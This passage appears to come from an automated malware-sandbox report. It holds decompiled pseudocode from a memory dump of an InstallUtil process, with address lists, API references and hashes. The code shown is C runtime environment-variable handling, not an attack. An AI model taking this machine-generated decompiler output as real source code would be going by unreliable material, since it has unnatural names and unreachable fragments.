				signed int _t246;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr* _t271;
				signed int _t274;
				signed int _t276;
				signed int _t280;
				signed int _t282;
				void* _t283;
				void* _t284;
				void* _t285;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int* _t292;
				signed int _t298;
				signed int _t299;
				CHAR* _t300;
				signed int _t302;
				signed int _t303;
				WCHAR* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t307;
				signed int _t308;
				signed int _t310;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;

				_t217 = _a4;
				if(_t217 != 0) {
					_t286 = _t217;
					_t116 = E004351F0(_t217, 0x3d);
					_v16 = _t116;
					_t231 = _t285;
					__eflags = _t116;
					if(_t116 == 0) {
						L10:
						 *((intOrPtr*)(E00439941())) = 0x16;
						goto L11;
					} else {
						__eflags = _t116 - _t217;
						if(_t116 == _t217) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t116 + 1));
							_t298 =  *0x46d4d0; // 0x11ec7e0
							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
							_v5 = _t120;
							__eflags = _t298 -  *0x46d4dc; // 0x11ec7e0
							if(__eflags == 0) {
								L87();
								_t298 = _t120;
								_t120 = _v5;
								_t231 = _t298;
								 *0x46d4d0 = _t298;
							}
							_t218 = 0;
							__eflags = _t298;
							if(_t298 != 0) {
								L21:
								_t233 = _t286;
								_t122 = _v16 - _t233;
								_push(_t122);
								_push(_t233);
								L121();
								_v12 = _t122;
								__eflags = _t122;
								if(_t122 < 0) {
									L29:
									__eflags = _v5 - _t218;
									if(_v5 != _t218) {
										goto L12;
									} else {
										_t123 =  ~_t122;
										_v12 = _t123;
										_t27 = _t123 + 2; // 0x2
										_t236 = _t27;
										__eflags = _t236 - _t123;
										if(_t236 < _t123) {
											goto L11;
										} else {
											__eflags = _t236 - 0x3fffffff;
											if(_t236 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t236);
												_t299 = E0044B846(_t298);
												E004427C2(_t218);
												_t320 = _t320 + 0x10;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L11;
												} else {
													_t237 = _v12;
													_t286 = _t218;
													_t126 = _a4;
													 *(_t299 + _t237 * 4) = _t126;
													 *(_t299 + 4 + _t237 * 4) = _t218;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t298 - _t218;
									if( *_t298 == _t218) {
										goto L29;
									} else {
										E004427C2( *((intOrPtr*)(_t298 + _t122 * 4)));
										_t282 = _v12;
										__eflags = _v5 - _t218;
										if(_v5 != _t218) {
											while(1) {
												__eflags =  *(_t298 + _t282 * 4) - _t218;
												if( *(_t298 + _t282 * 4) == _t218) {
													break;
												}
												 *(_t298 + _t282 * 4) =  *(_t298 + 4 + _t282 * 4);
												_t282 = _t282 + 1;
												__eflags = _t282;
											}
											_push(4);
											_push(_t282);
											_t299 = E0044B846(_t298);
											E004427C2(_t218);
											_t320 = _t320 + 0x10;
											_t126 = _t286;
											__eflags = _t299;
											if(_t299 != 0) {
												L34:
												 *0x46d4d0 = _t299;
											}
										} else {
											_t126 = _a4;
											_t286 = _t218;
											 *(_t298 + _t282 * 4) = _t126;
										}
										__eflags = _a8 - _t218;
										if(_a8 == _t218) {
											goto L12;
										} else {
											_t238 = _t126;
											_t283 = _t238 + 1;
											do {
												_t127 =  *_t238;
												_t238 = _t238 + 1;
												__eflags = _t127;
											} while (_t127 != 0);
											_v12 = _t238 - _t283 + 2;
											_t300 = E00441BB3(_t238 - _t283, _t238 - _t283 + 2, 1);
											_pop(_t241);
											__eflags = _t300;
											if(_t300 == 0) {
												L42:
												E004427C2(_t300);
												goto L12;
											} else {
												_t131 = E0043DAD7(_t300, _v12, _a4);
												_t321 = _t320 + 0xc;
												__eflags = _t131;
												if(_t131 != 0) {
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													E00438659();
													asm("int3");
													_t316 = _t321;
													_t322 = _t321 - 0xc;
													_push(_t218);
													_t220 = _v44;
													__eflags = _t220;
													if(_t220 != 0) {
														_push(_t300);
														_push(_t286);
														_push(0x3d);
														_t288 = _t220;
														_t133 = E004536E7(_t241);
														_v20 = _t133;
														_t244 = _t220;
														__eflags = _t133;
														if(_t133 == 0) {
															L54:
															 *((intOrPtr*)(E00439941())) = 0x16;
															goto L55;
														} else {
															__eflags = _t133 - _t220;
															if(_t133 == _t220) {
																goto L54;
															} else {
																_t302 =  *0x46d4d4; // 0x11ef008
																_t221 = 0;
																__eflags =  *(_t133 + 2);
																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
																_v9 = _t246;
																__eflags = _t302 -  *0x46d4d8; // 0x11e4730
																if(__eflags == 0) {
																	_push(_t302);
																	L104();
																	_t246 = _v9;
																	_t302 = _t133;
																	 *0x46d4d4 = _t302;
																}
																__eflags = _t302;
																if(_t302 != 0) {
																	L64:
																	_v20 = _v20 - _t288 >> 1;
																	_t138 = E0044B7D9(_t288, _v20 - _t288 >> 1);
																	_v16 = _t138;
																	__eflags = _t138;
																	if(_t138 < 0) {
																		L72:
																		__eflags = _v9 - _t221;
																		if(_v9 != _t221) {
																			goto L56;
																		} else {
																			_t139 =  ~_t138;
																			_v16 = _t139;
																			_t72 = _t139 + 2; // 0x2
																			_t252 = _t72;
																			__eflags = _t252 - _t139;
																			if(_t252 < _t139) {
																				goto L55;
																			} else {
																				__eflags = _t252 - 0x3fffffff;
																				if(_t252 >= 0x3fffffff) {
																					goto L55;
																				} else {
																					_push(4);
																					_push(_t252);
																					_t303 = E0044B846(_t302);
																					E004427C2(_t221);
																					_t322 = _t322 + 0x10;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L55;
																					} else {
																						_t253 = _v16;
																						_t288 = _t221;
																						_t142 = _v0;
																						 *(_t303 + _t253 * 4) = _t142;
																						 *(_t303 + 4 + _t253 * 4) = _t221;
																						goto L77;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t302 - _t221;
																		if( *_t302 == _t221) {
																			goto L72;
																		} else {
																			E004427C2( *((intOrPtr*)(_t302 + _t138 * 4)));
																			_t276 = _v16;
																			__eflags = _v9 - _t221;
																			if(_v9 != _t221) {
																				while(1) {
																					__eflags =  *(_t302 + _t276 * 4) - _t221;
																					if( *(_t302 + _t276 * 4) == _t221) {
																						break;
																					}
																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
																					_t276 = _t276 + 1;
																					__eflags = _t276;
																				}
																				_push(4);
																				_push(_t276);
																				_t303 = E0044B846(_t302);
																				E004427C2(_t221);
																				_t322 = _t322 + 0x10;
																				_t142 = _t288;
																				__eflags = _t303;
																				if(_t303 != 0) {
																					L77:
																					 *0x46d4d4 = _t303;
																				}
																			} else {
																				_t142 = _v0;
																				_t288 = _t221;
																				 *(_t302 + _t276 * 4) = _t142;
																			}
																			__eflags = _a4 - _t221;
																			if(_a4 == _t221) {
																				goto L56;
																			} else {
																				_t254 = _t142;
																				_t81 = _t254 + 2; // 0x2
																				_t284 = _t81;
																				do {
																					_t143 =  *_t254;
																					_t254 = _t254 + 2;
																					__eflags = _t143 - _t221;
																				} while (_t143 != _t221);
																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
																				_v16 = _t82;
																				_t304 = E00441BB3(_t254 - _t284 >> 1, _t82, 2);
																				_pop(_t258);
																				__eflags = _t304;
																				if(_t304 == 0) {
																					L85:
																					E004427C2(_t304);
																					goto L56;
																				} else {
																					_t148 = E00443BA1(_t304, _v16, _v0);
																					_t323 = _t322 + 0xc;
																					__eflags = _t148;
																					if(_t148 != 0) {
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						E00438659();
																						asm("int3");
																						_push(_t316);
																						_t317 = _t323;
																						_push(_t288);
																						_t290 = _v92;
																						__eflags = _t290;
																						if(_t290 != 0) {
																							_t260 = 0;
																							_t150 = _t290;
																							__eflags =  *_t290;
																							if( *_t290 != 0) {
																								do {
																									_t150 =  &(_t150[1]);
																									_t260 = _t260 + 1;
																									__eflags =  *_t150;
																								} while ( *_t150 != 0);
																							}
																							_t93 = _t260 + 1; // 0x2
																							_t305 = E00441BB3(_t260, _t93, 4);
																							_t262 = _t304;
																							__eflags = _t305;
																							if(_t305 == 0) {
																								L102:
																								E004421B4(_t221, _t284, _t290, _t305);
																								goto L103;
																							} else {
																								__eflags =  *_t290;
																								if( *_t290 == 0) {
																									L100:
																									E004427C2(0);
																									_t175 = _t305;
																									goto L101;
																								} else {
																									_push(_t221);
																									_t221 = _t305 - _t290;
																									__eflags = _t221;
																									do {
																										_t271 =  *_t290;
																										_t94 = _t271 + 1; // 0x5
																										_t284 = _t94;
																										do {
																											_t176 =  *_t271;
																											_t271 = _t271 + 1;
																											__eflags = _t176;
																										} while (_t176 != 0);
																										_t262 = _t271 - _t284;
																										_t95 = _t262 + 1; // 0x6
																										_v16 = _t95;
																										 *(_t221 + _t290) = E00441BB3(_t262, _t95, 1);
																										E004427C2(0);
																										_t323 = _t323 + 0xc;
																										__eflags =  *(_t221 + _t290);
																										if( *(_t221 + _t290) == 0) {
																											goto L102;
																										} else {
																											_t180 = E0043DAD7( *(_t221 + _t290), _v16,  *_t290);
																											_t323 = _t323 + 0xc;
																											__eflags = _t180;
																											if(_t180 != 0) {
																												L103:
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												E00438659();
																												asm("int3");
																												_push(_t317);
																												_t318 = _t323;
																												_push(_t262);
																												_push(_t262);
																												_push(_t290);
																												_t291 = _v128;
																												__eflags = _t291;
																												if(_t291 != 0) {
																													_push(_t221);
																													_t223 = 0;
																													_t156 = _t291;
																													_t263 = 0;
																													_v20 = 0;
																													_push(_t305);
																													__eflags =  *_t291;
																													if( *_t291 != 0) {
																														do {
																															_t156 =  &(_t156[1]);
																															_t263 = _t263 + 1;
																															__eflags =  *_t156;
																														} while ( *_t156 != 0);
																													}
																													_t104 = _t263 + 1; // 0x2
																													_t306 = E00441BB3(_t263, _t104, 4);
																													__eflags = _t306;
																													if(_t306 == 0) {
																														L119:
																														E004421B4(_t223, _t284, _t291, _t306);
																														goto L120;
																													} else {
																														__eflags =  *_t291 - _t223;
																														if( *_t291 == _t223) {
																															L117:
																															E004427C2(_t223);
																															_t167 = _t306;
																															goto L118;
																														} else {
																															_t223 = _t306 - _t291;
																															__eflags = _t223;
																															do {
																																_t267 =  *_t291;
																																_t105 = _t267 + 2; // 0x6
																																_t284 = _t105;
																																do {
																																	_t168 =  *_t267;
																																	_t267 = _t267 + 2;
																																	__eflags = _t168 - _v20;
																																} while (_t168 != _v20);
																																_t107 = (_t267 - _t284 >> 1) + 1; // 0x3
																																_v24 = _t107;
																																 *(_t223 + _t291) = E00441BB3(_t267 - _t284 >> 1, _t107, 2);
																																E004427C2(0);
																																_t323 = _t323 + 0xc;
																																__eflags =  *(_t223 + _t291);
																																if( *(_t223 + _t291) == 0) {
																																	goto L119;
																																} else {
																																	_t173 = E00443BA1( *(_t223 + _t291), _v24,  *_t291);
																																	_t323 = _t323 + 0xc;
																																	__eflags = _t173;
																																	if(_t173 != 0) {
																																		L120:
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		E00438659();
																																		asm("int3");
																																		_push(_t318);
																																		_push(_t223);
																																		_push(_t306);
																																		_push(_t291);
																																		_t292 =  *0x46d4d0; // 0x11ec7e0
																																		_t307 = _t292;
																																		__eflags =  *_t292;
																																		if( *_t292 == 0) {
																																			L127:
																																			_t308 = _t307 - _t292;
																																			__eflags = _t308;
																																			_t310 =  ~(_t308 >> 2);
																																		} else {
																																			_t225 = _v8;
																																			do {
																																				_t163 = E004459A9(_v12,  *_t307, _t225);
																																				_t323 = _t323 + 0xc;
																																				__eflags = _t163;
																																				if(_t163 != 0) {
																																					goto L126;
																																				} else {
																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
																																					__eflags = _t165 - 0x3d;
																																					if(_t165 == 0x3d) {
																																						L129:
																																						_t310 = _t307 - _t292 >> 2;
																																					} else {
																																						__eflags = _t165;
																																						if(_t165 == 0) {
																																							goto L129;
																																						} else {
																																							goto L126;
																																						}
																																					}
																																				}
																																				goto L128;
																																				L126:
																																				_t307 =  &(_t307[1]);
																																				__eflags =  *_t307;
																																			} while ( *_t307 != 0);
																																			goto L127;
																																		}
																																		L128:
																																		return _t310;
																																	} else {
																																		goto L115;
																																	}
																																}
																																goto L130;
																																L115:
																																_t291 = _t291 + 4;
																																__eflags =  *_t291 - _t173;
																															} while ( *_t291 != _t173);
																															_t223 = 0;
																															__eflags = 0;
																															goto L117;
																														}
																													}
																												} else {
																													_t167 = 0;
																													L118:
																													return _t167;
																												}
																											} else {
																												goto L98;
																											}
																										}
																										goto L130;
																										L98:
																										_t290 = _t290 + 4;
																										__eflags =  *_t290 - _t180;
																									} while ( *_t290 != _t180);
																									goto L100;
																								}
																							}
																						} else {
																							_t175 = 0;
																							L101:
																							return _t175;
																						}
																					} else {
																						_t274 =  &(_t304[_v20 + 1]);
																						 *(_t274 - 2) = _t148;
																						asm("sbb eax, eax");
																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
																						__eflags = _t185;
																						if(_t185 == 0) {
																							_t186 = E00439941();
																							_t221 = _t221 | 0xffffffff;
																							__eflags = _t221;
																							 *_t186 = 0x2a;
																						}
																						goto L85;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t191 =  *0x46d4d0; // 0x11ec7e0
																	__eflags = _a4 - _t221;
																	if(_a4 == _t221) {
																		L58:
																		__eflags = _t246;
																		if(_t246 != 0) {
																			goto L56;
																		} else {
																			__eflags = _t191;
																			if(_t191 != 0) {
																				L62:
																				 *0x46d4d4 = E00441BB3(_t246, 1, 4);
																				E004427C2(_t221);
																				_t322 = _t322 + 0xc;
																				goto L63;
																			} else {
																				 *0x46d4d0 = E00441BB3(_t246, 1, 4);
																				E004427C2(_t221);
																				_t322 = _t322 + 0xc;
																				__eflags =  *0x46d4d0 - _t221; // 0x11ec7e0
																				if(__eflags == 0) {
																					goto L55;
																				} else {
																					_t302 =  *0x46d4d4; // 0x11ef008
																					__eflags = _t302;
																					if(_t302 != 0) {
																						goto L64;
																					} else {
																						goto L62;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _t191;
																		if(_t191 == 0) {
																			goto L58;
																		} else {
																			_t196 = L0043FC85(_t221);
																			__eflags = _t196;
																			if(_t196 != 0) {
																				L63:
																				_t302 =  *0x46d4d4; // 0x11ef008
																				__eflags = _t302;
																				if(_t302 == 0) {
																					L55:
																					_t221 = _t220 | 0xffffffff;
																					__eflags = _t221;
																					L56:
																					E004427C2(_t288);
																					_t136 = _t221;
																					goto L57;
																				} else {
																					goto L64;
																				}
																			} else {
																				goto L54;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t197 = E00439941();
														 *_t197 = 0x16;
														_t136 = _t197 | 0xffffffff;
														L57:
														return _t136;
													}
												} else {
													_t280 = _v16 + 1 + _t300 - _a4;
													asm("sbb eax, eax");
													 *(_t280 - 1) = _t218;
													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
													__eflags = _t204;
													if(_t204 == 0) {
														_t205 = E00439941();
														_t218 = _t218 | 0xffffffff;
														__eflags = _t218;
														 *_t205 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t120;
									if(_t120 == 0) {
										 *0x46d4d0 = E00441BB3(_t231, 1, 4);
										E004427C2(_t218);
										_t298 =  *0x46d4d0; // 0x11ec7e0
										_t320 = _t320 + 0xc;
										__eflags = _t298;
										if(_t298 == 0) {
											goto L11;
										} else {
											__eflags =  *0x46d4d4 - _t218; // 0x11ef008
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0x46d4d4 = E00441BB3(_t231, 1, 4);
												E004427C2(_t218);
												_t320 = _t320 + 0xc;
												__eflags =  *0x46d4d4 - _t218; // 0x11ef008
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t218 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0x46d4d4 - _t218; // 0x11ef008
									if(__eflags == 0) {
										goto L14;
									} else {
										_t214 = L0043FC80(0);
										__eflags = _t214;
										if(_t214 != 0) {
											L19:
											_t298 =  *0x46d4d0; // 0x11ec7e0
											L20:
											__eflags = _t298;
											if(_t298 == 0) {
												L11:
												_t218 = _t217 | 0xffffffff;
												__eflags = _t218;
												L12:
												E004427C2(_t286);
												_t119 = _t218;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t215 = E00439941();
					 *_t215 = 0x16;
					_t119 = _t215 | 0xffffffff;
					L13:
					return _t119;
				}
				L130:
			}

0x0044b1a7
0x0044b1ac
0x0044b1c3
0x0044b1c5
0x0044b1ca
0x0044b1ce
0x0044b1cf
0x0044b1d1
0x0044b221
0x0044b226
0x00000000
0x0044b1d3
0x0044b1d3
0x0044b1d5
0x00000000
0x0044b1d7
0x0044b1d7
0x0044b1db
0x0044b1e1
0x0044b1e4
0x0044b1e7
0x0044b1ed
0x0044b1f0
0x0044b1f5
0x0044b1f7
0x0044b1fa
0x0044b1fb
0x0044b1fb
0x0044b201
0x0044b203
0x0044b205
0x0044b299
0x0044b29c
0x0044b29e
0x0044b2a0
0x0044b2a1
0x0044b2a2
0x0044b2a7
0x0044b2ac
0x0044b2ae
0x0044b2f8
0x0044b2f8
0x0044b2fb
0x00000000
0x0044b301
0x0044b301
0x0044b303
0x0044b306
0x0044b306
0x0044b309
0x0044b30b
0x00000000
0x0044b311
0x0044b311
0x0044b317
0x00000000
0x0044b31d
0x0044b31d
0x0044b31f
0x0044b327
0x0044b329
0x0044b32e
0x0044b331
0x0044b333
0x00000000
0x0044b339
0x0044b339
0x0044b33c
0x0044b33e
0x0044b341
0x0044b344
0x00000000
0x0044b344
0x0044b333
0x0044b317
0x0044b30b
0x0044b2b0
0x0044b2b0
0x0044b2b2
0x00000000
0x0044b2b4
0x0044b2b7
0x0044b2bd
0x0044b2c0
0x0044b2c3
0x0044b2d7
0x0044b2d7
0x0044b2da
0x00000000
0x00000000
0x0044b2d3
0x0044b2d6
0x0044b2d6
0x0044b2d6
0x0044b2dc
0x0044b2de
0x0044b2e6
0x0044b2e8
0x0044b2ed
0x0044b2f0
0x0044b2f2
0x0044b2f4
0x0044b348
0x0044b348
0x0044b348
0x0044b2c5
0x0044b2c5
0x0044b2c8
0x0044b2ca
0x0044b2ca
0x0044b34e
0x0044b351
0x00000000
0x0044b357
0x0044b357
0x0044b359
0x0044b35c
0x0044b35c
0x0044b35e
0x0044b35f
0x0044b35f
0x0044b36b
0x0044b373
0x0044b376
0x0044b377
0x0044b379
0x0044b3c2
0x0044b3c3
0x00000000
0x0044b37b
0x0044b382
0x0044b387
0x0044b38a
0x0044b38c
0x0044b3ce
0x0044b3cf
0x0044b3d0
0x0044b3d1
0x0044b3d2
0x0044b3d3
0x0044b3d8
0x0044b3dc
0x0044b3de
0x0044b3e1
0x0044b3e2
0x0044b3e5
0x0044b3e7
0x0044b3f9
0x0044b3fa
0x0044b3fb
0x0044b3fe
0x0044b400
0x0044b405
0x0044b409
0x0044b40a
0x0044b40c
0x0044b45d
0x0044b462
0x00000000
0x0044b40e
0x0044b40e
0x0044b410
0x00000000
0x0044b412
0x0044b412
0x0044b418
0x0044b41a
0x0044b41e
0x0044b421
0x0044b424
0x0044b42a
0x0044b42c
0x0044b42d
0x0044b433
0x0044b436
0x0044b438
0x0044b438
0x0044b43e
0x0044b440
0x0044b4cd
0x0044b4d8
0x0044b4db
0x0044b4e0
0x0044b4e5
0x0044b4e7
0x0044b531
0x0044b531
0x0044b534
0x00000000
0x0044b53a
0x0044b53a
0x0044b53c
0x0044b53f
0x0044b53f
0x0044b542
0x0044b544
0x00000000
0x0044b54a
0x0044b54a
0x0044b550
0x00000000
0x0044b556
0x0044b556
0x0044b558
0x0044b560
0x0044b562
0x0044b567
0x0044b56a
0x0044b56c
0x00000000
0x0044b572
0x0044b572
0x0044b575
0x0044b577
0x0044b57a
0x0044b57d
0x00000000
0x0044b57d
0x0044b56c
0x0044b550
0x0044b544
0x0044b4e9
0x0044b4e9
0x0044b4eb
0x00000000
0x0044b4ed
0x0044b4f0
0x0044b4f6
0x0044b4f9
0x0044b4fc
0x0044b510
0x0044b510
0x0044b513
0x00000000
0x00000000
0x0044b50c
0x0044b50f
0x0044b50f
0x0044b50f
0x0044b515
0x0044b517
0x0044b51f
0x0044b521
0x0044b526
0x0044b529
0x0044b52b
0x0044b52d
0x0044b581
0x0044b581
0x0044b581
0x0044b4fe
0x0044b4fe
0x0044b501
0x0044b503
0x0044b503
0x0044b587
0x0044b58a
0x00000000
0x0044b590
0x0044b590
0x0044b592
0x0044b592
0x0044b595
0x0044b595
0x0044b598
0x0044b59b
0x0044b59b
0x0044b5a6
0x0044b5aa
0x0044b5b2
0x0044b5b5
0x0044b5b6
0x0044b5b8
0x0044b5ff
0x0044b600
0x00000000
0x0044b5ba
0x0044b5c2
0x0044b5c7
0x0044b5ca
0x0044b5cc
0x0044b60b
0x0044b60c
0x0044b60d
0x0044b60e
0x0044b60f
0x0044b610
0x0044b615
0x0044b618
0x0044b619
0x0044b61c
0x0044b61d
0x0044b620
0x0044b622
0x0044b62b
0x0044b62d
0x0044b62f
0x0044b631
0x0044b633
0x0044b633
0x0044b636
0x0044b637
0x0044b637
0x0044b633
0x0044b63d
0x0044b648
0x0044b64b
0x0044b64c
0x0044b64e
0x0044b6b5
0x0044b6b5
0x00000000
0x0044b650
0x0044b650
0x0044b653
0x0044b6a5
0x0044b6a7
0x0044b6ad
0x00000000
0x0044b655
0x0044b655
0x0044b658
0x0044b658
0x0044b65a
0x0044b65a
0x0044b65c
0x0044b65c
0x0044b65f
0x0044b65f
0x0044b661
0x0044b662
0x0044b662
0x0044b666
0x0044b66a
0x0044b66e
0x0044b678
0x0044b67b
0x0044b680
0x0044b683
0x0044b687
0x00000000
0x0044b689
0x0044b691
0x0044b696
0x0044b699
0x0044b69b
0x0044b6ba
0x0044b6bc
0x0044b6bd
0x0044b6be
0x0044b6bf
0x0044b6c0
0x0044b6c1
0x0044b6c6
0x0044b6c9
0x0044b6ca
0x0044b6cc
0x0044b6cd
0x0044b6ce
0x0044b6cf
0x0044b6d2
0x0044b6d4
0x0044b6dd
0x0044b6de
0x0044b6e0
0x0044b6e2
0x0044b6e4
0x0044b6e7
0x0044b6e8
0x0044b6ea
0x0044b6ec
0x0044b6ec
0x0044b6ef
0x0044b6f0
0x0044b6f0
0x0044b6ec
0x0044b6f4
0x0044b6ff
0x0044b703
0x0044b705
0x0044b773
0x0044b773
0x00000000
0x0044b707
0x0044b707
0x0044b709
0x0044b763
0x0044b764
0x0044b76a
0x00000000
0x0044b70b
0x0044b70d
0x0044b70d
0x0044b70f
0x0044b70f
0x0044b711
0x0044b711
0x0044b714
0x0044b714
0x0044b717
0x0044b71a
0x0044b71a
0x0044b726
0x0044b72a
0x0044b732
0x0044b738
0x0044b73d
0x0044b740
0x0044b744
0x00000000
0x0044b746
0x0044b74e
0x0044b753
0x0044b756
0x0044b758
0x0044b778
0x0044b77a
0x0044b77b
0x0044b77c
0x0044b77d
0x0044b77e
0x0044b77f
0x0044b784
0x0044b787
0x0044b78a
0x0044b78b
0x0044b78c
0x0044b78d
0x0044b793
0x0044b795
0x0044b798
0x0044b7c4
0x0044b7c4
0x0044b7c4
0x0044b7c9
0x0044b79a
0x0044b79a
0x0044b79d
0x0044b7a3
0x0044b7a8
0x0044b7ab
0x0044b7ad
0x00000000
0x0044b7af
0x0044b7b1
0x0044b7b4
0x0044b7b6
0x0044b7d2
0x0044b7d4
0x0044b7b8
0x0044b7b8
0x0044b7ba
0x00000000
0x00000000
0x00000000
0x00000000
0x0044b7ba
0x0044b7b6
0x00000000
0x0044b7bc
0x0044b7bc
0x0044b7bf
0x0044b7bf
0x00000000
0x0044b79d
0x0044b7cb
0x0044b7d1
0x00000000
0x00000000
0x00000000
0x0044b758
0x00000000
0x0044b75a
0x0044b75a
0x0044b75d
0x0044b75d
0x0044b761
0x0044b761
0x00000000
0x0044b761
0x0044b709
0x0044b6d6
0x0044b6d6
0x0044b76e
0x0044b772
0x0044b772
0x00000000
0x00000000
0x00000000
0x0044b69b
0x00000000
0x0044b69d
0x0044b69d
0x0044b6a0
0x0044b6a0
0x00000000
0x0044b6a4
0x0044b653
0x0044b624
0x0044b624
0x0044b6b0
0x0044b6b4
0x0044b6b4
0x0044b5ce
0x0044b5d2
0x0044b5d5
0x0044b5df
0x0044b5e7
0x0044b5ed
0x0044b5ef
0x0044b5f1
0x0044b5f6
0x0044b5f6
0x0044b5f9
0x0044b5f9
0x00000000
0x0044b5ef
0x0044b5cc
0x0044b5b8
0x0044b58a
0x0044b4eb
0x0044b446
0x0044b446
0x0044b44b
0x0044b44e
0x0044b47b
0x0044b47b
0x0044b47d
0x00000000
0x0044b47f
0x0044b47f
0x0044b481
0x0044b4ac
0x0044b4b6
0x0044b4bb
0x0044b4c0
0x00000000
0x0044b483
0x0044b48d
0x0044b492
0x0044b497
0x0044b49a
0x0044b4a0
0x00000000
0x0044b4a2
0x0044b4a2
0x0044b4a8
0x0044b4aa
0x00000000
0x00000000
0x00000000
0x00000000
0x0044b4aa
0x0044b4a0
0x0044b481
0x0044b450
0x0044b450
0x0044b452
0x00000000
0x0044b454
0x0044b454
0x0044b459
0x0044b45b
0x0044b4c3
0x0044b4c3
0x0044b4c9
0x0044b4cb
0x0044b468
0x0044b468
0x0044b468
0x0044b46b
0x0044b46c
0x0044b473
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0044b45b
0x0044b452
0x0044b44e
0x0044b440
0x0044b410
0x0044b3e9
0x0044b3e9
0x0044b3ee
0x0044b3f4
0x0044b476
0x0044b47a
0x0044b47a
0x0044b38e
0x0044b397
0x0044b39f
0x0044b3a3
0x0044b3aa
0x0044b3b0
0x0044b3b2
0x0044b3b4
0x0044b3b9
0x0044b3b9
0x0044b3bc
0x0044b3bc
0x00000000
0x0044b3b2
0x0044b38c
0x0044b379
0x0044b351
0x0044b2b2
0x0044b20b
0x0044b20b
0x0044b20e
0x0044b23f
0x0044b23f
0x0044b241
0x0044b251
0x0044b256
0x0044b25b
0x0044b261
0x0044b264
0x0044b266
0x00000000
0x0044b268
0x0044b268
0x0044b26e
0x00000000
0x0044b270
0x0044b27a
0x0044b27f
0x0044b284
0x0044b287
0x0044b28d
0x00000000
0x00000000
0x00000000
0x00000000
0x0044b28d
0x0044b26e
0x0044b243
0x0044b243
0x00000000
0x0044b243
0x0044b210
0x0044b210
0x0044b216
0x00000000
0x0044b218
0x0044b218
0x0044b21d
0x0044b21f
0x0044b28f
0x0044b28f
0x0044b295
0x0044b295
0x0044b297
0x0044b22c
0x0044b22c
0x0044b22c
0x0044b22f
0x0044b230
0x0044b237
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0044b21f
0x0044b216
0x0044b20e
0x0044b205
0x0044b1d5
0x0044b1ae
0x0044b1ae
0x0044b1b3
0x0044b1b9
0x0044b23a
0x0044b23e
0x0044b23e
0x00000000

APIs

_free.LIBCMT ref: 0044B230
_free.LIBCMT ref: 0044B256
_free.LIBCMT ref: 0044B27F
_free.LIBCMT ref: 0044B2B7
_free.LIBCMT ref: 0044B2E8
_free.LIBCMT ref: 0044B329
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044B3AA
_free.LIBCMT ref: 0044B3C3
_wcschr.LIBVCRUNTIME ref: 0044B400
_free.LIBCMT ref: 0044B46C
_free.LIBCMT ref: 0044B492
_free.LIBCMT ref: 0044B4BB
_free.LIBCMT ref: 0044B4F0
_free.LIBCMT ref: 0044B521
_free.LIBCMT ref: 0044B562
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044B5E7
_free.LIBCMT ref: 0044B600

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$_wcschr
String ID:
API String ID: 3899193279-0
Opcode ID: e91aa10088e317238f023b76b73dae80beacb6864b392510e86de2c286329403
Instruction ID: 6ead060664317584d16e3b277bf431e6a5a664b5bbdb51fc59ac2edd09922d18
Opcode Fuzzy Hash: e91aa10088e317238f023b76b73dae80beacb6864b392510e86de2c286329403
Instruction Fuzzy Hash: 13D12471E003006BFB25AF769882A6EB7A4EF15724F0441AFE94597382EB7DDD0087D9

Uniqueness

Uniqueness Score: -1.00%

Function 0041235F Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041235F() {
				char _v264;
				char _v532;
				intOrPtr _v536;
				CHAR* _v540;
				intOrPtr _v544;
				CHAR* _v548;
				intOrPtr _v552;
				_Unknown_base(*)()* _t42;
				signed int _t52;
				struct HINSTANCE__* _t54;
				struct HINSTANCE__* _t57;
				intOrPtr* _t63;
				void* _t64;

